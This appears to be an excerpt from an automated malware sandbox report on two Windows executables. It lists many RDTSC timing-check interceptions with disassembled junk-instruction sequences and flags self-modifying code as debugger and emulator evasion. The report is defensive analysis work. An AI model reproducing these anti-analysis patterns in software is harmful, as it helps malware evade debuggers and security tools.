Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5F9F7 second address: B5F9FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B5F9FB second address: B5FA0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF0EC517C7Bh 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B661E1 second address: B661E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B661E5 second address: B661ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B661ED second address: B66207 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0EC6B64CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FF0EC6B64C6h 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B66207 second address: B6620F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6569F second address: B656A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65813 second address: B65838 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF0EC517C84h 0x00000016 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65838 second address: B6583E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6583E second address: B65847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65847 second address: B6584C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6584C second address: B65882 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C88h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FF0EC517C83h 0x0000000f popad 0x00000010 pushad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65882 second address: B6589E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B659DF second address: B659E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65F49 second address: B65F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B65F4F second address: B65F59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6609C second address: B660A6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF0EC6B64C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B660A6 second address: B660BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF0EC517C7Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B660BD second address: B660C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B67FB7 second address: B67FBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68592 second address: B68596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6873C second address: B68742 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68B57 second address: B68B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68B5B second address: B68B70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a or esi, 7E605B50h 0x00000010 nop 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68C1D second address: B68C23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68C23 second address: B68C27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68DAC second address: B68DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B68EC1 second address: B68EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jl 00007FF0EC517C76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B69615 second address: B696A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jne 00007FF0EC6B64CEh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007FF0EC6B64C8h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c pushad 0x0000002d mov cx, dx 0x00000030 sub cl, 00000054h 0x00000033 popad 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FF0EC6B64C8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 movsx esi, cx 0x00000053 or edi, 731DE286h 0x00000059 push 00000000h 0x0000005b jmp 00007FF0EC6B64CEh 0x00000060 push eax 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B696A6 second address: B696AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6A00C second address: B6A03C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF0EC6B64C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push esi 0x0000000e sub dword ptr [ebp+122D3179h], ebx 0x00000014 pop esi 0x00000015 push 00000000h 0x00000017 mov edi, dword ptr [ebp+122D302Fh] 0x0000001d push 00000000h 0x0000001f mov esi, 63665402h 0x00000024 xchg eax, ebx 0x00000025 jg 00007FF0EC6B64D0h 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6A03C second address: B6A05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF0EC517C87h 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6B11A second address: B6B131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 ja 00007FF0EC6B64C6h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FF0EC6B64C6h 0x00000017 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6D1D3 second address: B6D1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FF0EC517C76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B71C04 second address: B71C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b clc 0x0000000c push 00000000h 0x0000000e mov dword ptr [ebp+1244D635h], edx 0x00000014 push 00000000h 0x00000016 movzx ebx, di 0x00000019 mov ebx, dword ptr [ebp+122D2CB9h] 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 push edi 0x00000024 pop edi 0x00000025 pop esi 0x00000026 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B72BED second address: B72BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B72BF1 second address: B72C0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B77CAC second address: B77CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B77CB1 second address: B77D1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007FF0EC6B64C8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007FF0EC6B64C8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 je 00007FF0EC6B64C8h 0x00000049 mov bh, 17h 0x0000004b push 00000000h 0x0000004d stc 0x0000004e xchg eax, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FF0EC6B64CEh 0x00000056 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B79FE4 second address: B7A010 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF0EC517C7Fh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF0EC517C83h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7A010 second address: B7A014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7A014 second address: B7A01E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0EC517C76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7C71D second address: B7C723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7D8BE second address: B7D8C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B81952 second address: B819A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007FF0EC6B64D8h 0x00000012 push 00000000h 0x00000014 cld 0x00000015 push 00000000h 0x00000017 mov edi, 63BEA4AEh 0x0000001c push eax 0x0000001d pushad 0x0000001e jmp 00007FF0EC6B64D7h 0x00000023 je 00007FF0EC6B64CCh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B8294F second address: B82954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B82954 second address: B829C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FF0EC6B64C8h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 jno 00007FF0EC6B64CCh 0x0000002b mov ebx, 08449803h 0x00000030 push 00000000h 0x00000032 mov ebx, dword ptr [ebp+122D30CEh] 0x00000038 push 00000000h 0x0000003a xor bx, 4791h 0x0000003f push eax 0x00000040 pushad 0x00000041 jo 00007FF0EC6B64D5h 0x00000047 jmp 00007FF0EC6B64CFh 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007FF0EC6B64CDh 0x00000053 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B829C9 second address: B829CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B69EA1 second address: B69EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B69EA6 second address: B69EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B69EB0 second address: B69EB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6B9D5 second address: B6B9DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6C449 second address: B6C44F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6C44F second address: B6C453 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6C453 second address: B6C461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B6CF2A second address: B6CF42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C84h 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B73F5A second address: B73F74 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC6B64CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c je 00007FF0EC6B64CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B74E3D second address: B74E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C82h 0x00000009 popad 0x0000000a jl 00007FF0EC517C78h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FF0EC517C7Ch 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B74E68 second address: B74E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B77EA0 second address: B77EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF0EC517C76h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B77EAB second address: B77EB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FF0EC6B64C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B8FF0E second address: B8FF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B8FF12 second address: B8FF2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B1CE62 second address: B1CE7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF0EC517C83h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B92AFB second address: B92B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FF0EC6B64CDh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B92B16 second address: B92B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B92B1B second address: B92B20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B92B20 second address: B92B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B92C01 second address: 9BED6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2097CC02h 0x00000010 pushad 0x00000011 je 00007FF0EC6B64CBh 0x00000017 and di, 2600h 0x0000001c mov ax, cx 0x0000001f popad 0x00000020 push dword ptr [ebp+122D06B9h] 0x00000026 jmp 00007FF0EC6B64D4h 0x0000002b call dword ptr [ebp+122D207Ch] 0x00000031 pushad 0x00000032 jmp 00007FF0EC6B64D4h 0x00000037 xor eax, eax 0x00000039 jmp 00007FF0EC6B64D6h 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 clc 0x00000043 mov dword ptr [ebp+122D3B62h], eax 0x00000049 cld 0x0000004a mov esi, 0000003Ch 0x0000004f mov dword ptr [ebp+122D2050h], edx 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 mov dword ptr [ebp+122D2050h], ebx 0x0000005f cld 0x00000060 lodsw 0x00000062 mov dword ptr [ebp+122D2FAFh], edx 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D2FAFh], eax 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 mov dword ptr [ebp+122D2FAFh], esi 0x0000007d popad 0x0000007e or dword ptr [ebp+122D2050h], ecx 0x00000084 nop 0x00000085 jns 00007FF0EC6B64D0h 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 pop edx 0x00000092 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B93ED0 second address: B93EDD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7DAA5 second address: B7DAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7EB46 second address: B7EB4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B81B26 second address: B81B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B81B2A second address: B81B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF0EC517C7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B81B38 second address: B81B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B984D9 second address: B984E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B984E3 second address: B984F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jo 00007FF0EC6B64DBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B9860B second address: B9861B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007FF0EC517C76h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B98882 second address: B98886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7A5376 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5ED592 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5EFE6E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7B35F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 82EE49 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: 9BEDE0 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: 9BED17 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: B5E3FF instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: B6F87A instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: 9BECE0 instructions caused by: Self-modifying code
